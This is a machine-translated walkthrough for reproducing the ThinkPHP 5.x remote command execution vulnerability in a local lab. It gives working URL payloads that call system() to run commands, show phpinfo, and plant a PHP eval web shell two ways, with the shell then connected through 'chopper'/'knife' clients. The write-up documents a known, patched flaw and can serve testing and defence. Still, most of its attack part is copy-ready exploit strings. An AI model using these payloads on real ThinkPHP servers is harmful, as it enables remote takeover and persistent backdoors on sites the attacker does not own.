ThinkPHP 5.x remote command execution vulnerability reproduction
First, Vulnerability Description
December 10, 2018, ThinkPHP official released a security update, which fixes a high-risk vulnerabilities ThinkPHP5 framework: https://blog.thinkphp.cn/869075
The reason is due to the vulnerability of the framework controller name without adequate testing, resulting in the absence of mandatory open route (not turned on by default) could lead to remote code execution, the affected versions include 5.0 and 5.1.
Second, the flaw affects versions
Thinkphp 5.x-Thinkphp 5.1.31
Thinkphp 5.0.x<=5.0.23
Third, the vulnerability reproduction
1, download the official Thinkphp 5.0.22, download address: http://www.thinkphp.cn/donate/download/id/1260.html
2, using phpstudy built environment, extract the downloaded Thinkphp5.0.22 to the next site directory, browser access http://192.168.10.171/thinkphp5.0.22/public
3, using the system function remote command execution
Payload as follows:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
4, to see through phpinfo phpinfo function () information
Payload as follows:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
5, write shell
Payload as follows:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php
Note: You need to use ^ escaped (escape under way cmd environment), windows environment echo command string to the output document without quotation marks (single and double quotation marks), some characters are OK url which do not encode special characters.
6, to see if successfully written shell
7, choppers connection
8, the second method of writing the shell
Payload as follows:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>
9 to see if the file is successfully written
10, knives connection